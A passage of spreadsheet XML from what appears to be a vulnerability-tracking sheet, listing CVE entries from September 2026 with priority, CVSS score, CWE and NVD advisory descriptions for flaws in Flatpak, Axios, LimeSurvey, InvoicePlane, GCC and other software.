      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libXtst's RECORD reply parser in libXtst before 1.2.6 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94286</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97023</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the export/bin directory during app deployment allows a malicious Flatpak app to cause deletion of attacker-chosen files outside the deployment directory when the app is installed or upgraded. In system-wide installations, the deletion is performed as root.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97023</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97024</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the files/etc directory during app deployment allows a malicious Flatpak app to cause certain host system files (such as passwd, group, machine-id, or resolv.conf) to be emptied or replaced with a symlink when the app is installed or upgraded. In system-wide installations, the write is performed as root.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97024</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97685</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>help@fluidattacks.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>An authenticated LimeSurvey Community Edition 7.3.0 user allowed to create surveys can use their own survey as an authorized context while supplying question or answer identifiers belonging to another user's survey. The REST survey-patching endpoint checks the attacker's permission against the survey ID in the request URL, but the vulnerable persistence operations resolve the target object independently by its global qid or aid and never verify that it belongs to that authorized survey.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97685</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100392</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, Users::form() performs no object-level authorization check on user_id = 1. A Secondary Administrator (user_type = 1, user_id != 1) can rewrite the Primary Administrator's user_type to 2 (Guest / read-only), destroying the root account's privilege and locking the legitimate owner out of the instance. At time of publication, there are no publicly available patches.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100392</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Axios HTTP/2 request setup does not consistently apply proxy settings and caller-supplied DNS lookup policy. An HTTPS request uses httpVersion: 2 with explicit config.proxy or environment-derived proxy settings, or relies on caller-supplied config.lookup DNS policy. The HTTP/2 path can connect without the configured proxy behavior or without applying the caller-supplied config.lookup policy before http2.connect(). Requests can bypass the intended proxy route or the caller-supplied DNS resolution policy. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-601</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.17.0 until 1.20.0, the fetch adapter bypasses the maxRedirects: 0 redirect policy. An Axios request uses the fetch adapter with maxRedirects set to zero and receives a redirect response. The underlying fetch implementation follows the redirect instead of returning the redirect response unchanged. The redirected request can access internal responses or reach state-changing internal endpoints despite redirects being disabled. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102010</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GCC. When an application calls the erase_if function on a binary heap priority queue in libstdc++, the library reallocates storage but fails to update its internal entry pointer. An attacker capable of triggering this operation can exploit this use-after-free condition, leading to a Denial of Service (DoS) via an application crash or potential memory corruption.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102010</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80357</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80357</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101004</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in notionnext-org NotionNext up to 4.10.10. Affected by this issue is the function cleanCache of the file pages/api/cache.js of the component Authentication Guard. The manipulation of the argument token leads to missing authentication. The attack may be initiated remotely. Versions 4.1.0 - 4.9.5.2 allow unauthenticated exploitation due to missing method check. In versions 4.9.5.7 - 4.10.10 a guard present but only enforced when CACHE_REVALIDATION_TOKEN is set. Default deployments remain unprotected. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101004</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101083</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in PMWeb v7.x/v8.x/v2025.x. Impacted is an unknown function in the library encryptionhelper.dll. Such manipulation leads to information disclosure. The attack may be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101083</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-693, CWE-74</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.12.0 until 1.20.0, ResolveConfig reads inherited Symbol.toStringTag, append, and getHeaders properties while resolving FormData headers. A separate same-process prototype-pollution flaw supplies an array or non-plain class instance whose inherited properties make it appear FormData-like; plain objects are blocked. The inherited getHeaders function can return attacker-controlled headers that resolveConfig merges into a fetch adapter request. Attacker-controlled headers can alter authorization, cache, metadata-service, or application-specific request behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests, gin</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.27.2 until 0.34.0 and 1.20.0, Axios default-instance requests that omit an explicit method can read an inherited method value from Object.prototype. If another vulnerability in the same process pollutes Object.prototype.method, calls such as axios.request({ url }) and axios({ url }) can send a state-changing HTTP method instead of the expected default GET. Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch. This issue is fixed in version 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, rust</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-74</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.0.0 until 1.20.0, the dispatchRequest function normalizes inherited Object.prototype.headers from a replacement request configuration. A separate same-process prototype-pollution flaw sets Object.prototype.headers, and trusted request interceptors return a new ordinary configuration without an own headers property. After the interceptor chain, dispatchRequest resolves the inherited headers during normalization. Downstream request processing can observe attacker-controlled headers, including authorization-related values. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.7.0 until 1.20.0, the fetch adapter constructs a Request with sanitized resolvedOptions but then calls fetch with the original fetchOptions. A separate same-process prototype-pollution flaw populates Object.prototype.headers so fetchOptions.headers resolves through inheritance. The inherited fetchOptions.headers value overrides the sanitized Request headers through the second argument to fetch after Request construction. Attacker-controlled request headers can alter authorization, caching, metadata-service access, or application-specific behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101910</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M151" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N151" s="5" t="inlineStr">
